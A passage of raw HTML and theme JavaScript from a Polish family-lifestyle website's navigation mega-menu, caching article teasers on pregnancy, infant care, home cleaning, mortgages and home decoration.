<\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zalety-porodu-prywatnym-szpitalu\/\" rel=\"bookmark\" title=\"Zalety porodu w prywatnym szpitalu\">Zalety porodu w prywatnym szpitalu<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2017-07-26T09:37:18+00:00\" >26 lipca 2017<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/mozna-ufac-kalkulatorowi-daty-porodu\/\" rel=\"bookmark\" title=\"Czy mo\u017cna ufa\u0107 kalkulatorowi daty porodu?\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/07\/pregnancy-775041_1280.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/07\/pregnancy-775041_1280.jpg 950w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/07\/pregnancy-775041_1280-300x199.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/07\/pregnancy-775041_1280-768x510.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/07\/pregnancy-775041_1280-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/07\/pregnancy-775041_1280-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Czy mo\u017cna ufa\u0107 kalkulatorowi daty porodu?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/ciaza-i-porod\/porod\/\" class=\"td-post-category\">Por\u00f3d<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/mozna-ufac-kalkulatorowi-daty-porodu\/\" rel=\"bookmark\" title=\"Czy mo\u017cna ufa\u0107 kalkulatorowi daty porodu?\">Czy mo\u017cna ufa\u0107 kalkulatorowi daty porodu?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-07-12T19:17:50+00:00\" >12 lipca 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_25_5c5e20b78d5c3","td_hide_prev":true,"td_hide_next":false}));
                                    </script>
            <div class="td-container td_block_wrap td_block_mega_menu td_uid_25_5c5e20b78d5c3_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_25_5c5e20b78d5c3"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="mega-menu-sub-cat-td_uid_25_5c5e20b78d5c3" id="td_uid_26_5c5e20b78d916" data-td_block_id="td_uid_25_5c5e20b78d5c3" data-td_filter_value="31" href="http://www.erodzina.com/kategoria/ciaza-i-porod/ciaza/">Ciąża</a><a class="mega-menu-sub-cat-td_uid_25_5c5e20b78d5c3" id="td_uid_27_5c5e20b78d945" data-td_block_id="td_uid_25_5c5e20b78d5c3" data-td_filter_value="33" href="http://www.erodzina.com/kategoria/ciaza-i-porod/karmienie/">Karmienie</a><a class="mega-menu-sub-cat-td_uid_25_5c5e20b78d5c3" id="td_uid_28_5c5e20b78d96c" data-td_block_id="td_uid_25_5c5e20b78d5c3" data-td_filter_value="68" href="http://www.erodzina.com/kategoria/ciaza-i-porod/niemowleta/">Niemowlęta</a><a class="mega-menu-sub-cat-td_uid_25_5c5e20b78d5c3" id="td_uid_29_5c5e20b78d991" data-td_block_id="td_uid_25_5c5e20b78d5c3" data-td_filter_value="35" href="http://www.erodzina.com/kategoria/ciaza-i-porod/nieplodnosc/">Niepłodność</a><a class="mega-menu-sub-cat-td_uid_25_5c5e20b78d5c3" id="td_uid_30_5c5e20b78d9b5" data-td_block_id="td_uid_25_5c5e20b78d5c3" data-td_filter_value="30" href="http://www.erodzina.com/kategoria/ciaza-i-porod/nim-zajdziesz-w-ciaze/">Nim zajdziesz w ciąże</a><a class="mega-menu-sub-cat-td_uid_25_5c5e20b78d5c3" id="td_uid_31_5c5e20b78d9dd" data-td_block_id="td_uid_25_5c5e20b78d5c3" data-td_filter_value="32" href="http://www.erodzina.com/kategoria/ciaza-i-porod/porod/">Poród</a><a class="cur-sub-cat mega-menu-sub-cat-td_uid_25_5c5e20b78d5c3 mega-menu-cat-all" id="td_uid_32_5c5e20b78da00" data-td_block_id="td_uid_25_5c5e20b78d5c3" data-td_filter_value="" href="http://www.erodzina.com/kategoria/ciaza-i-porod/">Wszystko Ciąża i Poród</a></div></div><div id="td_uid_25_5c5e20b78d5c3" class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/zdrowe-kaszki-dla-niemowlat-takze-dla-alergikow/" rel="bookmark" title="Zdrowe kaszki dla niemowląt także dla alergików"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/02/9e7ae08563048ee9b9ae9085db55b3a6-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/02/9e7ae08563048ee9b9ae9085db55b3a6-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/02/9e7ae08563048ee9b9ae9085db55b3a6-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/02/9e7ae08563048ee9b9ae9085db55b3a6-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Zdrowe kaszki dla niemowląt także dla alergików"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/karmienie/" class="td-post-category">Karmienie</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/zdrowe-kaszki-dla-niemowlat-takze-dla-alergikow/" rel="bookmark" title="Zdrowe kaszki dla niemowląt także dla alergików">Zdrowe kaszki dla niemowląt także dla alergików</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-02-04T16:05:44+00:00">4 lutego 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/czy-i-kiedy-uzywac-poduszki-klin-dla-niemowlaka-i-dzieciaka/" rel="bookmark" title="Czy i kiedy używać poduszki klin dla niemowlaka i dzieciaka?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/brothers-457237_1280-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/01/brothers-457237_1280-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/01/brothers-457237_1280-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/01/brothers-457237_1280-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Czy i kiedy używać poduszki klin dla niemowlaka i dzieciaka?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/niemowleta/" class="td-post-category">Niemowlęta</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/czy-i-kiedy-uzywac-poduszki-klin-dla-niemowlaka-i-dzieciaka/" rel="bookmark" title="Czy i kiedy używać poduszki klin dla niemowlaka i dzieciaka?">Czy i kiedy używać poduszki klin dla niemowlaka i dzieciaka?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-09T19:13:29+00:00">9 stycznia 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/akcesoria-niezbedne-w-wyprawce-dla-niemowlaka/" rel="bookmark" title="Akcesoria niezbędne w wyprawce dla niemowlaka"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/dziecko-260x195.jpeg" srcset="http://www.erodzina.com/wp-content/uploads/2019/01/dziecko-260x195.jpeg 260w, http://www.erodzina.com/wp-content/uploads/2019/01/dziecko-80x60.jpeg 80w, http://www.erodzina.com/wp-content/uploads/2019/01/dziecko-245x184.jpeg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Akcesoria niezbędne w wyprawce dla niemowlaka"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/niemowleta/" class="td-post-category">Niemowlęta</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/akcesoria-niezbedne-w-wyprawce-dla-niemowlaka/" rel="bookmark" title="Akcesoria niezbędne w wyprawce dla niemowlaka">Akcesoria niezbędne w wyprawce dla niemowlaka</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-03T11:59:38+00:00">3 stycznia 2019</time></span>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_25_5c5e20b78d5c3" data-td_block_id="td_uid_25_5c5e20b78d5c3"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_25_5c5e20b78d5c3" data-td_block_id="td_uid_25_5c5e20b78d5c3"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-5102"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/" class="sf-with-ul">Dom<i class="td-icon-menu-down"></i></a>
<ul class="sub-menu" style="display: none; float: none; width: 20em;">
	<li class="menu-item-0" style="white-space: normal; float: left; width: 100%;"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_33_5c5e20b793bd7 = new tdBlock();
block_td_uid_33_5c5e20b793bd7.id = "td_uid_33_5c5e20b793bd7";
block_td_uid_33_5c5e20b793bd7.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"85","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_33_5c5e20b793bd7_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_33_5c5e20b793bd7_rand","tdc_css_class_style":"td_uid_33_5c5e20b793bd7_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_33_5c5e20b793bd7.td_column_number = "3";
block_td_uid_33_5c5e20b793bd7.block_type = "td_block_mega_menu";
block_td_uid_33_5c5e20b793bd7.post_count = "3";
block_td_uid_33_5c5e20b793bd7.found_posts = "150";
block_td_uid_33_5c5e20b793bd7.header_color = "";
block_td_uid_33_5c5e20b793bd7.ajax_pagination_infinite_stop = "";
block_td_uid_33_5c5e20b793bd7.max_num_pages = "50";
tdBlocksArray.push(block_td_uid_33_5c5e20b793bd7);
</script>            <script>
                var tmpObj = JSON.parse(JSON.stringify(block_td_uid_33_5c5e20b793bd7));
                tmpObj.is_ajax_running = true;
                var currentBlockObjSignature = JSON.stringify(tmpObj);
                tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-prawidlowo-umyc-toalete\/\" rel=\"bookmark\" title=\"Jak prawid\u0142owo umy\u0107 toalet\u0119?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bathroom-1228427_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bathroom-1228427_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bathroom-1228427_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bathroom-1228427_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak prawid\u0142owo umy\u0107 toalet\u0119?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/kuchnia-i-lazienka\/\" class=\"td-post-category\">Kuchnia i \u0141azienka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-prawidlowo-umyc-toalete\/\" rel=\"bookmark\" title=\"Jak prawid\u0142owo umy\u0107 toalet\u0119?\">Jak prawid\u0142owo umy\u0107 toalet\u0119?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-22T14:48:42+00:00\" >22 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/kredyt-hipoteczny-na-dom-co-warto-wiedziec\/\" rel=\"bookmark\" title=\"Kredyt hipoteczny na dom \u2013 co warto wiedzie\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/5020eb291997a0e6e810820b12548830-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/5020eb291997a0e6e810820b12548830-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/5020eb291997a0e6e810820b12548830-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/5020eb291997a0e6e810820b12548830-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kredyt hipoteczny na dom \u2013 co warto wiedzie\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/budujemy-i-remontujemy\/\" class=\"td-post-category\">Budujemy i Remontujemy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/kredyt-hipoteczny-na-dom-co-warto-wiedziec\/\" rel=\"bookmark\" title=\"Kredyt hipoteczny na dom \u2013 co warto wiedzie\u0107?\">Kredyt hipoteczny na dom \u2013 co warto wiedzie\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-15T15:22:31+00:00\" >15 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/oczyszczacz-powietrza-czy-warto-kupic\/\" rel=\"bookmark\" title=\"Oczyszczacz powietrza czy warto kupi\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/oczyszczaczpowietrza1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/oczyszczaczpowietrza1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/oczyszczaczpowietrza1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/oczyszczaczpowietrza1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Oczyszczacz powietrza czy warto kupi\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/salon-i-sypialnia\/\" class=\"td-post-category\">Salon i Sypialnia<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/oczyszczacz-powietrza-czy-warto-kupic\/\" rel=\"bookmark\" title=\"Oczyszczacz powietrza czy warto kupi\u0107?\">Oczyszczacz powietrza czy warto kupi\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-13T20:01:44+00:00\" >13 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_33_5c5e20b793bd7","td_hide_prev":true,"td_hide_next":false}));
                                            tmpObj = JSON.parse(JSON.stringify(block_td_uid_33_5c5e20b793bd7));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 92;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/kredyt-hipoteczny-na-dom-co-warto-wiedziec\/\" rel=\"bookmark\" title=\"Kredyt hipoteczny na dom \u2013 co warto wiedzie\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/5020eb291997a0e6e810820b12548830-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/5020eb291997a0e6e810820b12548830-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/5020eb291997a0e6e810820b12548830-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/5020eb291997a0e6e810820b12548830-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kredyt hipoteczny na dom \u2013 co warto wiedzie\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/budujemy-i-remontujemy\/\" class=\"td-post-category\">Budujemy i Remontujemy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/kredyt-hipoteczny-na-dom-co-warto-wiedziec\/\" rel=\"bookmark\" title=\"Kredyt hipoteczny na dom \u2013 co warto wiedzie\u0107?\">Kredyt hipoteczny na dom \u2013 co warto wiedzie\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-15T15:22:31+00:00\" >15 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jaka-zaslone-okienna-warto-wybrac-do-nowoczesnego-domu\/\" rel=\"bookmark\" title=\"Jak\u0105 zas\u0142on\u0119 okienn\u0105 warto wybra\u0107 do nowoczesnego domu?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/architecture-1477041_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/architecture-1477041_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/architecture-1477041_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/architecture-1477041_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak\u0105 zas\u0142on\u0119 okienn\u0105 warto wybra\u0107 do nowoczesnego domu?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/budujemy-i-remontujemy\/\" class=\"td-post-category\">Budujemy i Remontujemy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jaka-zaslone-okienna-warto-wybrac-do-nowoczesnego-domu\/\" rel=\"bookmark\" title=\"Jak\u0105 zas\u0142on\u0119 okienn\u0105 warto wybra\u0107 do nowoczesnego domu?\">Jak\u0105 zas\u0142on\u0119 okienn\u0105 warto wybra\u0107 do nowoczesnego domu?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-12T21:39:12+00:00\" >12 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ogrzewanie-podlogowe-plusy-i-minusy\/\" rel=\"bookmark\" title=\"Ogrzewanie pod\u0142ogowe &#8211; plusy i minusy\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/wooden-floor-1336166_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/wooden-floor-1336166_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/wooden-floor-1336166_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/wooden-floor-1336166_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Ogrzewanie pod\u0142ogowe &#8211; plusy i minusy\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/budujemy-i-remontujemy\/\" class=\"td-post-category\">Budujemy i Remontujemy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ogrzewanie-podlogowe-plusy-i-minusy\/\" rel=\"bookmark\" title=\"Ogrzewanie pod\u0142ogowe &#8211; plusy i minusy\">Ogrzewanie pod\u0142ogowe &#8211; plusy i minusy<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-17T12:35:02+00:00\" >17 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_33_5c5e20b793bd7","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_33_5c5e20b793bd7));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 91;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/leonkameleon-pl-nowy-sklep-z-dekoracjami-na-imprezki-dla-dzieci\/\" rel=\"bookmark\" title=\"LeonKameleon.pl &#8211; Nowy sklep z dekoracjami na imprezki dla dzieci\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/zaproszenia-na-przyjecia-unicorn-jednorozec-10szt-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/zaproszenia-na-przyjecia-unicorn-jednorozec-10szt-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/zaproszenia-na-przyjecia-unicorn-jednorozec-10szt-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/zaproszenia-na-przyjecia-unicorn-jednorozec-10szt-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"LeonKameleon.pl &#8211; Nowy sklep z dekoracjami na imprezki dla dzieci\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/dekoracje\/\" class=\"td-post-category\">Dekoracje<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/leonkameleon-pl-nowy-sklep-z-dekoracjami-na-imprezki-dla-dzieci\/\" rel=\"bookmark\" title=\"LeonKameleon.pl &#8211; Nowy sklep z dekoracjami na imprezki dla dzieci\">LeonKameleon.pl &#8211; Nowy sklep z dekoracjami na imprezki dla dzieci<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-06-06T16:12:27+00:00\" >6 czerwca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/aranzacje-ze-sztucznych-kwiatow-do-salonu\/\" rel=\"bookmark\" title=\"Aran\u017cacje ze sztucznych kwiat\u00f3w do salonu\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/aranzacje-z-kwiatow-sztucznych-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/aranzacje-z-kwiatow-sztucznych-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/aranzacje-z-kwiatow-sztucznych-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/aranzacje-z-kwiatow-sztucznych-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Aran\u017cacje ze sztucznych kwiat\u00f3w do salonu\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/dekoracje\/\" class=\"td-post-category\">Dekoracje<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/aranzacje-ze-sztucznych-kwiatow-do-salonu\/\" rel=\"bookmark\" title=\"Aran\u017cacje ze sztucznych kwiat\u00f3w do salonu\">Aran\u017cacje ze sztucznych kwiat\u00f3w do salonu<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-03-23T11:17:02+00:00\" >23 marca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/rolety-dzien-noc-dlaczego-sa-tak-popularne\/\" rel=\"bookmark\" title=\"Rolety dzie\u0144 noc \u2013 dlaczego s\u0105 tak popularne?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/fotolia_182276054_subscription_xxl-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/fotolia_182276054_subscription_xxl-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/fotolia_182276054_subscription_xxl-300x225.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/fotolia_182276054_subscription_xxl-768x576.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/fotolia_182276054_subscription_xxl-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/fotolia_182276054_subscription_xxl-245x184.jpg 245w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/fotolia_182276054_subscription_xxl-640x480.jpg 640w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/fotolia_182276054_subscription_xxl-980x735.jpg 980w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/fotolia_182276054_subscription_xxl.jpg 1000w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Rolety dzie\u0144 noc \u2013 dlaczego s\u0105 tak popularne?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a 